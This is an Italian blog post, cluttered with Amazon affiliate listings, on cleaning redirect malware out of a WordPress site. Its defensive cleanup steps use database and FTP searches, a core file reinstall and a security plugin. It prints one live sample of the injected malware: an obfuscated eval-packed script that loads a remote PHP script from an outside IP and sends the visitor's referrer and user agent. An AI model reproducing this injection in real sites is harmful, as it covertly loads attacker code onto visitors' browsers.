Rimuovere malware da wordpress
Virus Wordpress 

WordPress infettato da Malware – In sito risponde ed effettua un redirect verso altri siti – Una soluzione

Scritto da:admin 4700 visualizzazioni 0 Commenti ,,,,,,,,,,

Pensate che  il vostro Blog WordPress sia infettato da Malware è state cercando una soluzione ?

INIU Cavo USB Type-C, Cavo USB A a USB C 3,1A Ricarica Rapida [3Pezzi/0,5+2+2m] Lega Intrecciato in Nylon QC 3,0 Cavo Tipo C per iPhone 16 15 Samsung S22 Xiaomi Huawei Pixel OnePlus Realme ECC. #1
INIU Cavo USB Type-C, Cavo USB A a USB C 3,1A Ricarica Rapida [3Pezzi/0,5+2+2m] Lega Intrecciato in Nylon QC 3,0 Cavo Tipo C per iPhone 16 15 Samsung S22 Xiaomi Huawei Pixel OnePlus Realme ECC. #2
INIU Cavo USB Type-C, Cavo USB A a USB C 3,1A Ricarica Rapida [3Pezzi/0,5+2+2m] Lega Intrecciato in Nylon QC 3,0 Cavo Tipo C per iPhone 16 15 Samsung S22 Xiaomi Huawei Pixel OnePlus Realme ECC. #3
INIU Cavo USB Type-C, Cavo USB A a USB C 3,1A Ricarica Rapida [3Pezzi/0,5+2+2m] Lega Intrecciato in Nylon QC 3,0 Cavo Tipo C per iPhone 16 15 Samsung S22 Xiaomi Huawei Pixel OnePlus Realme ECC. #4
INIU Cavo USB Type-C, Cavo USB A a USB C 3,1A Ricarica Rapida [3Pezzi/0,5+2+2m] Lega Intrecciato in Nylon QC 3,0 Cavo Tipo C per iPhone 16 15 Samsung S22 Xiaomi Huawei Pixel OnePlus Realme ECC. #5
INIU Cavo USB Type-C, Cavo USB A a USB C 3,1A Ricarica Rapida [3Pezzi/0,5+2+2m] Lega Intrecciato in Nylon QC 3,0 Cavo Tipo C per iPhone 16 15 Samsung S22 Xiaomi Huawei Pixel OnePlus Realme ECC.
4.6 su 5 stelle(32920)
Available for Amazon Prime 8% Off 9,99 € 9,10 € (a partire da 25/11/2024 12:58 GMT +01:00 - Altre informazioniProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)
INIU - Il Professionista della Ricarica Veloce SICURA: Prova la ricarica più sicura con oltre 38 milioni di utenti globali. In INIU, utilizziamo solo materiali di altissima qualità, quindi abbiamo la ... read more

Il comportamento che voglio illustrarvi oggi è strano ma affatto sconosciuto; praticamente succede questo :

  • Se cercate di collegarvi al vostro sito la prima volta noterete un redirect verso un sito che vi è assolutamente sconosciuto, non necessariamente lo stesso
  • se provate di nuovo il vostro sito risponde regolarmente… salvo ricominciare se lasciate trascorrere qualche ora

Queslla che vi propongo, purtroppo , non è una soluzione “automatica” dovete svolgere un po’ di lavoro ma sembra funzionare a dovere

Come rimuovere malware su WordPress

Il primo passaggio è quello di verificare se effettivamente il vostro sito sia stato infettato da un malware di qualche tipo.

Nuovo Amazon Kindle (16 GB)| Il più leggero e compatto, con schermo antiriflesso, cambio pagina più rapido, illuminazione frontale regolabile, batteria di lunga durata| Con pubblicità| Nero #1
Nuovo Amazon Kindle (16 GB)| Il più leggero e compatto, con schermo antiriflesso, cambio pagina più rapido, illuminazione frontale regolabile, batteria di lunga durata| Con pubblicità| Nero #2
Nuovo Amazon Kindle (16 GB)| Il più leggero e compatto, con schermo antiriflesso, cambio pagina più rapido, illuminazione frontale regolabile, batteria di lunga durata| Con pubblicità| Nero #3
Nuovo Amazon Kindle (16 GB)| Il più leggero e compatto, con schermo antiriflesso, cambio pagina più rapido, illuminazione frontale regolabile, batteria di lunga durata| Con pubblicità| Nero #4
Nuovo Amazon Kindle (16 GB)| Il più leggero e compatto, con schermo antiriflesso, cambio pagina più rapido, illuminazione frontale regolabile, batteria di lunga durata| Con pubblicità| Nero #5
Nuovo Amazon Kindle (16 GB)| Il più leggero e compatto, con schermo antiriflesso, cambio pagina più rapido, illuminazione frontale regolabile, batteria di lunga durata| Con pubblicità| Nero
4.3 su 5 stelle(56)
Available for Amazon Prime 12% Off 109,00 € 94,90 € (a partire da 25/11/2024 11:39 GMT +01:00 - Altre informazioniProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)
Il nostro Kindle più leggero e compatto: ora con un’illuminazione frontale più luminosa (se impostata al massimo), un contrasto più elevato e cambi di pagina più rapidi, per una migliore esperienza di... read more

Per fare questo recatevi sul portale di SUCURI alla pagina di controllo WEB… potete fare click direttamente QUI

Scansionare siti wordpress ricerca malware

Sucuri vi restituirà i risultati dei suoi test… se non trova nulla vi segnalerà che non avete di che preoccuparvi, diversamente vi segnalerà le pagine nelle quali rileva codice segnalato come Malware

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|etkrr|var|u0026u|referrer|rbith||js|php'.split('|'),0,{}))
</script></noindex>

Quello che vedete è un esempio del codice Malware che potreste trovare all’interno del vostro sito.

A questo, se è il vostro caso,  punto la domanda che certamente vi state facendo da un po’ :

Come rimuovere completamente un malware da WordPress ?

Vi anticipo che per questa operazione dovete necessariamente disporre di queste 2 possibilità :

  • Collegamento al gestore databaseMySql ( remoto o locale : PhpMyAdmin o quello che preferite )
  • Collegamento FTP al sito

( PRIMA DI COMINCIARE – fate un backup completo del sito e del relativo database !!!)

La prima cosa che dovete fare è connettervi al DB MySql ef effettuare una ricerca su tutte le tabelle del vostro DB per una parte ( vi suggerisco eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)} ) o tutto il codice del malware trovato

Quasi certamente troverete il malware su POST e PAGINE… scegliendo Mostra e poi Modifica dovete rimuovere a mano tutto il codice rappresentativo del Malware ( nel mio caso da <noindex>...a</noindex> compresi)

Per vostra tranquillità, tramite FTP scaricate l’intero sito su un vostro computer e da qui effettuate la ricerca dello stesso codice all’interno di tutti i files compresi Php, Css, Js, Png, Jpg… insomma TUTTI !!! Come fare ? Semplicissimo :

Vi recate nella cartella principale del sito che avete scaricato inserite le parole da cercare in alto a destra e selezionate le opzioni avanzate per specificare di cercare all’interno dei files

Quasi certamente non troverete nulla ma… la sicurezza non è mai troppa!

A questo punto, sempre tramite il collegamento FTP cancellate completamente le directory WP-ADMIN e WP-INCLUDES e reinviatele di fresco partendo da un’installazione nuova di WP della stessa versione di quella che state utilizzando ( in genere l’ultima )… lo sapete certamente ma l’ultima versione di WP la potete scaricare da qui

 

Verificate che tutto funzioni correttamente ed installate un PLUGIN per la sicurezza come Wordfence… non fate altre modifiche per 1 o 2 giorni per capire se il malware ricompare da solo… se così fosse contattate il provider perchè è probabile che il problema non siate voi ma il gestore.

>Per dubbi o suggerimenti… ci scriviamo nei commenti!!!

 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Available for Amazon Prime